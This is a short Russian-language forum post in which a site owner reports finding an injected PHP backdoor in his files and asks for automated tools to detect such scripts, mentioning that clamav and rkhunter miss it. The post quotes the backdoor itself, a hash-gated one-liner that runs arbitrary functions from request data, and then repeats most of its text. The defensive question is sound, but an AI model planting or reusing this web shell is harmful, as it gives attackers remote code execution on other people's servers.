nalim
Новичок
Нашел у себя в некоторых файлах вот такой код:
Что он делает более-менее понятно - выполняет произвольный код.
Как используется тоже понятно - хост используют в ботнетах для атак и рассылки спама.
Как решить проблему в конкретном случае - так же более менее ясно - просто удалить этот фрагмент.
Посоветуйте есть ли каке-то автоматизированное средство борьбы с подобными веселыми скриптами?
Дело в том что ни clamav ни rkhunter и не думают на этот скрипт ругаться.
На ум приходят Suhosin и контроль за изменениями файлов через систему контроля версий.
Может быть есть еще какие-то эффективные мер и средства?
PHP:
<?php if(@md5($_SERVER['HTTP_PATH'])==='5cd2973f835de94b560b62465d5a37f3'){ @extract($_REQUEST); @die($stime($mtime)); } ?>
Как используется тоже понятно - хост используют в ботнетах для атак и рассылки спама.
Как решить проблему в конкретном случае - так же более менее ясно - просто удалить этот фрагмент.
Посоветуйте есть ли каке-то автоматизированное средство борьбы с подобными веселыми скриптами?
Дело в том что ни clamav ни rkhunter и не думают на этот скрипт ругаться.
На ум приходят Suhosin и контроль за изменениями файлов через систему контроля версий.
Может быть есть еще какие-то эффективные мер и средства?